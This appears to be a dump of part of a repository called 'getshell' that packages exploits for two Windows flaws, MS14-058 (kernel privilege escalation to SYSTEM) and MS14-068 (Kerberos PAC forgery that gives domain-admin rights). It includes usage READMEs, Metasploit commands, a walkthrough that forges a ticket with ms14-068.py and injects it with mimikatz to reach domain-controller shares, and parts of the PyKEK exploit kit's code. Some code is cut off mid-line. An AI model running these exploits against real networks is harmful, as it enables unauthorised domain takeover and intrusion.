https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/Exploit.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1 2 | Release|Win32|C:\Users\Hx\Desktop\39666\39666\Exploit\| 3 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/stdafx.obj: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/stdafx.obj -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/vc140.pdb -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Exploit.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 
4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Release/Exploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Release/Exploit.exe -------------------------------------------------------------------------------- /MS14-058/Exploit/Release/Exploit.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Release/Exploit.iobj -------------------------------------------------------------------------------- /MS14-058/Exploit/Release/Exploit.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Release/Exploit.ipdb -------------------------------------------------------------------------------- /MS14-058/Exploit/Release/Exploit.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Release/Exploit.pdb -------------------------------------------------------------------------------- /MS14-058/MS14-058.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/MS14-058.exe -------------------------------------------------------------------------------- /MS14-058/README.md: 
--------------------------------------------------------------------------------
# MS14-058

- Trigger and exploit code for CVE-2014-4113
- The poc was from [@sam-b](https://github.com/sam-b/CVE-2014-4113)

Vulnerability reference:
* [MS14-058](https://technet.microsoft.com/library/security/ms14-058)


## Usage
```
c:\> Win64.exe whoami
nt authority\system
```

![win7](win7.png)
Cobalt Strike on Windows 2008:
![2008](2008.png)
## Loading the module within the Metasploit console
```
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > show targets
...targets...
msf exploit(ms14_058_track_popup_menu) > set TARGET
msf exploit(ms14_058_track_popup_menu) > show options
...show and set options...
msf exploit(ms14_058_track_popup_menu) > exploit
```

## Links

- [CrowdStrike Discovers Use of 64-bit Zero-Day Privilege Escalation Exploit (CVE-2014-4113) by Hurricane Panda](https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/)
- [Making CVE-2014-4113 successfully overflow Win8](http://www.freebuf.com/articles/system/50110.html)
--------------------------------------------------------------------------------
/MS14-058/Trigger/Trigger.opensdf:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/MS14-058/Trigger/Trigger.sln:
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 2013 for Windows Desktop
VisualStudioVersion = 12.0.31101.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Trigger", "Trigger\Trigger.vcxproj", "{CAE544C2-0E50-41F6-9940-1EC88CB15E38}"
EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Release|Win32 = Release|Win32 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {CAE544C2-0E50-41F6-9940-1EC88CB15E38}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {CAE544C2-0E50-41F6-9940-1EC88CB15E38}.Debug|Win32.Build.0 = Debug|Win32 16 | {CAE544C2-0E50-41F6-9940-1EC88CB15E38}.Release|Win32.ActiveCfg = Release|Win32 17 | {CAE544C2-0E50-41F6-9940-1EC88CB15E38}.Release|Win32.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Trigger/Trigger.v12.suo -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : Trigger Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this Trigger application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your Trigger application. 9 | 10 | 11 | Trigger.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 
16 | 17 | Trigger.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | Trigger.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named Trigger.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/Trigger.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/stdafx.cpp: -------------------------------------------------------------------------------- 1 | 
// stdafx.cpp : source file that includes just the standard includes 2 | // Trigger.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
#include <SDKDDKVer.h>   // header name restored from the comment above; it was lost in extraction
--------------------------------------------------------------------------------
/MS14-058/win7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/win7.png
--------------------------------------------------------------------------------
/MS14-068/MS14-068.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/MS14-068.exe
--------------------------------------------------------------------------------
/MS14-068/README.md:
--------------------------------------------------------------------------------
# MS14-068

```
Escalates an ordinary domain user to domain-controller (Domain Admin) privileges.
After exploitation, `net use \\swg.server.com\c$` gives direct access to the domain controller's shares.
```

The KDC of an unpatched domain controller accepts a PAC whose signatures were made with a checksum type that needs no key, so a forged PAC listing privileged group RIDs is accepted. Fixed by KB3011780; a patched DC rejects the forged ticket.

Vulnerability reference:
* [MS14-068](https://technet.microsoft.com/library/security/ms14-068)
* [CVE-2014-6324](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324)

## Usage

Domain controller: DCwin03, domain: demo.com, ordinary domain user: hx

Log on as the domain user hx and run `whoami /user` in cmd to get the account's SID:
demo\hx S-1-5-21-3813283032-1038476579-1047458262-1110

![x1](img/x1.png)
![x2](img/x2.png)

Log off hx and log on as the local user 123, then run the PoC with hx's credentials and SID against the DC:
```
python ms14-068.py -u hx@demo.com -p pwd_of_hx -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com
```
![x3](img/x3.png)
![x4](img/x4.png)

Inject the resulting ccache into the current logon session with mimikatz (`kerberos::ptc`, pass-the-ccache); the `net use` that follows then authenticates with the forged ticket:
```
c:\Users\123>mimikatz.exe "kerberos::ptc TGT_hx@demo.com.ccache" exit

net use \\DCwin03\admin$

dir \\DCwin03\c$
```

## References
* [Additional information about CVE-2014-6324](http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx)
* [An in-depth look at the MS14-068 vulnerability (Chinese)](http://www.freebuf.com/vuls/56081.html)
* [Attack Methods for Gaining Domain Admin Rights in Active Directory](https://adsecurity.org/?p=2362)
* [MS14-068 domain-controller privilege escalation and its mitigation (Chinese)](http://www.php230.com/weixin1418640395.html)
* [MS14-068 privilege escalation PoC](http://www.secpulse.com/archives/2874.html)

--------------------------------------------------------------------------------
/MS14-068/img/x1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/img/x1.png
--------------------------------------------------------------------------------
/MS14-068/img/x2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/img/x2.png
--------------------------------------------------------------------------------
/MS14-068/img/x3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/img/x3.png
--------------------------------------------------------------------------------
/MS14-068/img/x4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/img/x4.png
--------------------------------------------------------------------------------
/MS14-068/mimikatz_trunk.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/mimikatz_trunk.zip
--------------------------------------------------------------------------------
/MS14-068/pykek/README.md:
--------------------------------------------------------------------------------
Python Kerberos Exploitation Kit
===

PyKEK (Python Kerberos Exploitation Kit), a Python library to manipulate KRB5-related data. (Still in development)

For now, only a few functionalities have been implemented (in a quick-and-dirty way) to exploit MS14-068 (CVE-2014-6324).

More is coming...

# Author
Sylvain Monné

Contact : sylvain dot monne at solucom dot fr

http://twitter.com/bidord

Special thanks to: Benjamin DELPY `gentilkiwi`

# Library content
* kek.krb5: Kerberos V5 ([RFC 4120](https://tools.ietf.org/html/rfc4120)) ASN.1 structures and basic protocol functions
* kek.ccache: Credential Cache Binary Format ([ccache](http://www.gnu.org/software/shishi/manual/html_node/The-Credential-Cache-Binary-File-Format.html))
* kek.pac: Microsoft Privilege Attribute Certificate Data Structure ([MS-PAC](http://msdn.microsoft.com/en-us/library/cc237917.aspx))
* kek.crypto: Kerberos and MS specific cryptographic functions

# Exploits
## ms14-068.py
Exploits the [MS14-068](https://technet.microsoft.com/en-us/library/security/ms14-068.aspx) vulnerability on an unpatched domain controller of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups:
- Domain Users (513)
- Domain Admins (512)
- Schema Admins (518)
- Enterprise Admins (519)
- Group Policy Creator Owners (520)

### Usage :
```
USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControllerAddr>

OPTIONS:
    -p <clearPassword>
    --rc4 <ntlmHash>
```
### Example usage :
#### Linux (tested with samba and MIT Kerberos)
```
root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0
```
#### On Windows

```
python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit
```
--------------------------------------------------------------------------------
/MS14-068/pykek/kek/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/pykek/kek/__init__.py
--------------------------------------------------------------------------------
/MS14-068/pykek/kek/_crypto/ARC4.py:
--------------------------------------------------------------------------------
# Pure-Python RC4 fallback used when PyCrypto's Crypto.Cipher.ARC4 is not
# installed (see kek/crypto.py). Written for Python 2: key and data are
# byte strings (str), so ord()/chr() operate on single bytes.
class ARC4Cipher(object):
    def __init__(self, key):
        self.key = key

    def encrypt(self, data):
        # Key-scheduling algorithm (KSA): permute S under the key.
        S = list(range(256))
        j = 0
        out = []
        for i in range(256):
            j = (j + S[i] + ord(self.key[i % len(self.key)])) % 256
            S[i], S[j] = S[j], S[i]
        # Pseudo-random generation algorithm (PRGA): XOR the keystream into data.
        i = j = 0
        for char in data:
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            S[i], S[j] = S[j], S[i]
            out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
        return ''.join(out)

    def decrypt(self, data):
        # RC4 is a stream cipher: decryption is the same XOR.
        return self.encrypt(data)

def new(key):
    return ARC4Cipher(key)
--------------------------------------------------------------------------------
/MS14-068/pykek/kek/_crypto/MD4.py:
--------------------------------------------------------------------------------
import hashlib

# MD4 is only available if the underlying OpenSSL build exposes it; with
# OpenSSL 3 it lives in the legacy provider and hashlib.new('md4') raises
# ValueError ("unsupported hash type") unless that provider is loaded.
def new(*args):
    return hashlib.new('md4', *args)
--------------------------------------------------------------------------------
/MS14-068/pykek/kek/_crypto/MD5.py:
--------------------------------------------------------------------------------
import hashlib

def new(*args):
    return hashlib.md5(*args)
--------------------------------------------------------------------------------
/MS14-068/pykek/kek/_crypto/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/pykek/kek/_crypto/__init__.py
--------------------------------------------------------------------------------
/MS14-068/pykek/kek/crypto.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

# Author
# ------
# Sylvain Monne
# Contact : sylvain dot monne at solucom dot fr
# http://twitter.com/bidord

from random import getrandbits, sample
from struct import pack

# Prefer PyCrypto; fall back to the pure-Python modules in kek/_crypto.
try:
    from Crypto.Cipher import ARC4
    from Crypto.Hash import HMAC, MD5, MD4
except ImportError:
    from _crypto import ARC4, MD5, MD4
    import hmac as HMAC

# supported encryption types (Kerberos etype numbers)
RC4_HMAC = 23

# supported checksum types: RSA_MD5 (7) is unkeyed, HMAC_MD5 (-138) is keyed
RSA_MD5 = 7
HMAC_MD5 = 0xFFFFFF76

def random_bytes(n):
    # Note: random.sample() is not a CSPRNG and never repeats a value, so the
    # n bytes are always distinct; acceptable for a PoC confounder, not for keys.
    return ''.join(chr(c) for c in sample(xrange(256), n))

def decrypt(etype, key, msg_type, encrypted):
    if etype != RC4_HMAC:
        raise NotImplementedError('Only RC4-HMAC supported!')
    # RC4-HMAC ciphertext is a 16-byte HMAC-MD5 checksum followed by the RC4 output.
    chksum = encrypted[:16]
    data = encrypted[16:]
    k1 = HMAC.new(key, pack(' 0: 43 | idx = idx - 1 44 | if client[idx] is None: # Optional component 45 | continue 46 | if client.getDefaultComponentByPosition(idx) == client[idx]: 47 | continue 48 | comps.append(client[idx]) 49 | comps.sort(key=lambda x: isinstance(x, univ.Choice) and \ 50 | x.getMinTagSet() or
x.getTagSet()) 51 | for c in comps: 52 | substrate += encodeFun(c, defMode, maxChunkSize) 53 | else: 54 | # SetOf 55 | compSubs = [] 56 | while idx > 0: 57 | idx = idx - 1 58 | compSubs.append( 59 | encodeFun(client[idx], defMode, maxChunkSize) 60 | ) 61 | compSubs.sort() # perhaps padding's not needed 62 | substrate = null 63 | for compSub in compSubs: 64 | substrate += compSub 65 | return substrate, 1 66 | 67 | tagMap = encoder.tagMap.copy() 68 | tagMap.update({ 69 | univ.Boolean.tagSet: BooleanEncoder(), 70 | univ.BitString.tagSet: BitStringEncoder(), 71 | univ.OctetString.tagSet: OctetStringEncoder(), 72 | univ.SetOf().tagSet: SetOfEncoder() # conflcts with Set 73 | }) 74 | 75 | typeMap = encoder.typeMap.copy() 76 | typeMap.update({ 77 | univ.Set.typeId: SetOfEncoder(), 78 | univ.SetOf.typeId: SetOfEncoder() 79 | }) 80 | 81 | class Encoder(encoder.Encoder): 82 | def __call__(self, client, defMode=0, maxChunkSize=0): 83 | return encoder.Encoder.__call__(self, client, defMode, maxChunkSize) 84 | 85 | encode = Encoder(tagMap, typeMap) 86 | 87 | # EncoderFactory queries class instance and builds a map of tags -> encoders 88 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/codec/der/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 
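The module kek/crypto.py above declares etype RC4_HMAC = 23 and two checksum types, the unkeyed RSA_MD5 (7) and the keyed HMAC_MD5 (0xFFFFFF76), and its decrypt() starts by splitting the 16-byte checksum off the ciphertext. The following is an added example, not pykek's code, that implements those primitives on Python 3 with the standard library only, following RFC 4757 for RC4-HMAC encryption and for the HMAC-MD5 checksum. It assumes key usage 17 (KERB_NON_KERB_CKSUM_SALT, the PAC-signature usage from MS-PAC) and uses a constructed sample key, plaintext and PAC buffer. The last function makes the MS14-068 point concrete: a PAC signature of the unkeyed RSA_MD5 type can be reproduced by anyone, while an HMAC_MD5 signature needs the key, which is why a KDC must insist on a keyed checksum type before it trusts a PAC.

```python
"""RC4-HMAC (etype 23) and Kerberos checksums per RFC 4757, stdlib only (added example)."""
import hashlib
import hmac
import os
from struct import pack

RC4_HMAC = 23                  # etype, as in kek/crypto.py
RSA_MD5 = 7                    # unkeyed checksum type
HMAC_MD5 = 0xFFFFFF76          # keyed checksum type (-138)
KERB_NON_KERB_CKSUM_SALT = 17  # assumed key usage for PAC signatures (MS-PAC)

# Constructed sample inputs; a real key would be the NT hash (MD4 of the UTF-16LE password).
SAMPLE_KEY = bytes(range(16))
SAMPLE_PT = b'constructed EncTicketPart bytes'
SAMPLE_PAC = b'constructed PAC buffer listing RIDs 512,513,518,519,520'


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; the same routine encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                        # key scheduling (KSA)
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:                              # keystream generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 s.5: K1 = HMAC(K, T); checksum = HMAC(K1, confounder||data);
    K3 = HMAC(K1, checksum); output = checksum || RC4(K3, confounder||data)."""
    if confounder is None:
        confounder = os.urandom(8)              # a CSPRNG, unlike pykek's random.sample
    k1 = hmac_md5(key, pack('<I', usage))       # T is the key usage, 4 bytes little-endian
    data = confounder + plaintext
    checksum_ = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum_)
    return checksum_ + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, encrypted: bytes) -> bytes:
    """Inverse of rc4_hmac_encrypt; verifies the checksum before releasing plaintext."""
    checksum_, body = encrypted[:16], encrypted[16:]
    k1 = hmac_md5(key, pack('<I', usage))
    k3 = hmac_md5(k1, checksum_)
    data = rc4(k3, body)
    if not hmac.compare_digest(hmac_md5(k1, data), checksum_):
        raise ValueError('RC4-HMAC checksum mismatch')
    return data[8:]                             # strip the 8-byte confounder


def decrypt_rejects(key: bytes, usage: int, encrypted: bytes) -> bool:
    """True when rc4_hmac_decrypt refuses the input (tampered body or wrong key usage)."""
    try:
        rc4_hmac_decrypt(key, usage, encrypted)
    except ValueError:
        return True
    return False


def checksum(cksumtype: int, key: bytes, usage: int, data: bytes) -> bytes:
    """Kerberos checksum over data. RSA_MD5 ignores the key entirely; HMAC_MD5 is
    RFC 4757 s.4: Ksign = HMAC(K, 'signaturekey\\0'); HMAC(Ksign, MD5(T || data))."""
    if cksumtype == RSA_MD5:
        return hashlib.md5(data).digest()
    if cksumtype == HMAC_MD5:
        ksign = hmac_md5(key, b'signaturekey\x00')
        return hmac_md5(ksign, hashlib.md5(pack('<I', usage) + data).digest())
    raise NotImplementedError('unsupported checksum type %d' % cksumtype)


def attacker_can_forge(cksumtype: int, server_key: bytes, pac: bytes) -> bool:
    """Can a party without server_key produce a PAC signature the verifier accepts?
    The attacker signs with an unrelated key; the verifier recomputes with the real one."""
    forged = checksum(cksumtype, b'\x00' * 16, KERB_NON_KERB_CKSUM_SALT, pac)
    genuine = checksum(cksumtype, server_key, KERB_NON_KERB_CKSUM_SALT, pac)
    return hmac.compare_digest(forged, genuine)


if __name__ == '__main__':
    blob = rc4_hmac_encrypt(SAMPLE_KEY, 2, SAMPLE_PT)
    print('round trip ok:', rc4_hmac_decrypt(SAMPLE_KEY, 2, blob) == SAMPLE_PT)
    print('RSA_MD5 PAC signature forgeable without key:', attacker_can_forge(RSA_MD5, SAMPLE_KEY, SAMPLE_PAC))
    print('HMAC_MD5 PAC signature forgeable without key:', attacker_can_forge(HMAC_MD5, SAMPLE_KEY, SAMPLE_PAC))
```

Run it directly to see the round trip and the two forgery checks; decrypt_rejects() shows that flipping a single ciphertext byte, or using the wrong key-usage number, is caught before any plaintext is returned.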
2 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/codec/der/decoder.py: -------------------------------------------------------------------------------- 1 | # DER decoder 2 | from pyasn1.type import univ 3 | from pyasn1.codec.cer import decoder 4 | 5 | tagMap = decoder.tagMap 6 | typeMap = decoder.typeMap 7 | Decoder = decoder.Decoder 8 | 9 | decode = Decoder(tagMap, typeMap) 10 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/codec/der/encoder.py: -------------------------------------------------------------------------------- 1 | # DER encoder 2 | from pyasn1.type import univ 3 | from pyasn1.codec.cer import encoder 4 | 5 | class SetOfEncoder(encoder.SetOfEncoder): 6 | def _cmpSetComponents(self, c1, c2): 7 | tagSet1 = isinstance(c1, univ.Choice) and \ 8 | c1.getEffectiveTagSet() or c1.getTagSet() 9 | tagSet2 = isinstance(c2, univ.Choice) and \ 10 | c2.getEffectiveTagSet() or c2.getTagSet() 11 | return cmp(tagSet1, tagSet2) 12 | 13 | tagMap = encoder.tagMap.copy() 14 | tagMap.update({ 15 | # Overload CER encodrs with BER ones (a bit hackerish XXX) 16 | univ.BitString.tagSet: encoder.encoder.BitStringEncoder(), 17 | univ.OctetString.tagSet: encoder.encoder.OctetStringEncoder(), 18 | # Set & SetOf have same tags 19 | univ.SetOf().tagSet: SetOfEncoder() 20 | }) 21 | 22 | typeMap = encoder.typeMap 23 | 24 | class Encoder(encoder.Encoder): 25 | def __call__(self, client, defMode=1, maxChunkSize=0): 26 | return encoder.Encoder.__call__(self, client, defMode, maxChunkSize) 27 | 28 | encode = Encoder(tagMap, typeMap) 29 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/compat/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 
2 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/compat/octets.py: -------------------------------------------------------------------------------- 1 | from sys import version_info 2 | 3 | if version_info[0] <= 2: 4 | int2oct = chr 5 | ints2octs = lambda s: ''.join([ int2oct(x) for x in s ]) 6 | null = '' 7 | oct2int = ord 8 | octs2ints = lambda s: [ oct2int(x) for x in s ] 9 | str2octs = lambda x: x 10 | octs2str = lambda x: x 11 | isOctetsType = lambda s: isinstance(s, str) 12 | else: 13 | ints2octs = bytes 14 | int2oct = lambda x: ints2octs((x,)) 15 | null = ints2octs() 16 | oct2int = lambda x: x 17 | octs2ints = lambda s: [ x for x in s ] 18 | str2octs = lambda x: x.encode() 19 | octs2str = lambda x: x.decode() 20 | isOctetsType = lambda s: isinstance(s, bytes) 21 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/debug.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pyasn1.compat.octets import octs2ints 3 | from pyasn1 import error 4 | from pyasn1 import __version__ 5 | 6 | flagNone = 0x0000 7 | flagEncoder = 0x0001 8 | flagDecoder = 0x0002 9 | flagAll = 0xffff 10 | 11 | flagMap = { 12 | 'encoder': flagEncoder, 13 | 'decoder': flagDecoder, 14 | 'all': flagAll 15 | } 16 | 17 | class Debug: 18 | defaultPrinter = sys.stderr.write 19 | def __init__(self, *flags): 20 | self._flags = flagNone 21 | self._printer = self.defaultPrinter 22 | self('running pyasn1 version %s' % __version__) 23 | for f in flags: 24 | if f not in flagMap: 25 | raise error.PyAsn1Error('bad debug flag %s' % (f,)) 26 | self._flags = self._flags | flagMap[f] 27 | self('debug category \'%s\' enabled' % f) 28 | 29 | def __str__(self): 30 | return 'logger %s, flags %x' % (self._printer, self._flags) 31 | 32 | def __call__(self, msg): 